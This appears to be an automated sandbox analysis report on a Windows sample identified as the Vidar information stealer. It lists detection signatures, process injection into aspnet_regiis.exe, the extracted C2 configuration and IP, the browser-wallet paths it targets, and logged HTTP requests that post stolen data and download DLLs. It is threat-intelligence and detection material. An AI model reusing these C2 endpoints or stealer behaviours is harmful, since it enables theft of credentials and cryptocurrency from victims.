Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1524652
MD5: cc94be13bc24599e326d03ca246a61fa
SHA1: 73ed54a021153213ee4823683e4a9376b479d939
SHA256: 41ee1357282ed8722ff127ac17ff0831a92a54e72c32a560abeae0d27f5c090e
Tags: exe, user-Bitsight

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CC94BE13BC24599E326D03CA246A61FA)
    • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

Source | Rule | Description | Author | Strings
3.2.aspnet_regiis.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
3.2.aspnet_regiis.exe.400000.0.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
3.2.aspnet_regiis.exe.400000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
3.2.aspnet_regiis.exe.400000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
0.2.file.exe.6d771000.7.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:26:43.493413+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57947 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:44.657800+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57948 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:46.021316+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57949 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:47.472469+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57950 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:48.838450+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57951 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:50.433191+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57952 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:51.659845+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57953 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:54.683434+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57954 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:55.767673+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57955 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:57.026967+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57956 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:58.473481+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57957 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:00.540687+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57958 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:02.447080+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57959 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:04.221912+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57960 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:05.898986+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57961 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:07.438246+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57962 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:10.650406+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57963 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:12.316186+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57964 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:13.692925+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57965 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:15.636741+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57966 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:17.744774+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57968 | 49.12.197.9 | 443 | TCP
2024-10-03T03:27:20.454725+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.7 | 57969 | 49.12.197.9 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:26:48.172762+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 49.12.197.9 | 443 | 192.168.2.7 | 57950 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:26:49.661070+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 49.12.197.9 | 443 | 192.168.2.7 | 57951 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:26:46.730519+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.7 | 57949 | 49.12.197.9 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-03T03:27:22.257645+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 57970 | 147.45.44.104 | 80 | TCP

                          AV Detection

                          Source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
                          Source: https://49.12.197.9/ | Virustotal: Detection: 10%
                          Source: https://49.12.197.9/sqlp.dll | Virustotal: Detection: 11%
                          Source: https://49.12.197.9 | Virustotal: Detection: 10%
                          Source: file.exe | Virustotal: Detection: 27%
                          Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Roaming\msvcp110.dll | Joe Sandbox ML: detected
                          Source: file.exe | Joe Sandbox ML: detected
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004080A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00408048
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00411E5D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,3_2_0040A7D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC36C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6CC36C80
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:57946 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.7:57947 version: TLS 1.2
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdb source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: softokn3.pdb@ source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2599259096.000000003A30F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: aspnet_regiis.exe, 00000003.00000002.2594589461.000000002E429000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: aspnet_regiis.exe, 00000003.00000002.2608149755.000000006CE5F000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: aspnet_regiis.exe, 00000003.00000002.2588862570.0000000021FD8000.00000002.00001000.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2585478276.000000001C060000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: softokn3.pdb source: aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D762CBD FindFirstFileExW,0_2_6D762CBD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax3_2_004014AD

                          Networking

                          Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.7:57951
                          Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.7:57950
                          Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:57949 -> 49.12.197.9:443
                          Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199780418869
                          Source: global traffic | HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                          Source: Joe Sandbox View | IP Address: 49.12.197.9
                          Source: Joe Sandbox View | IP Address: 104.102.49.254
                          Source: Joe Sandbox View | IP Address: 147.45.44.104
                          Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
                          Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
                          Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57950 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57949 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57953 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57948 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57947 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57952 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57951 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57954 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57957 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57955 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57956 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57958 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57959 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57960 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57961 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57962 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57963 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57966 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57965 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57968 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57964 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.7:57969 -> 49.12.197.9:443
                          Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:57970 -> 147.45.44.104:80
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 6965Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
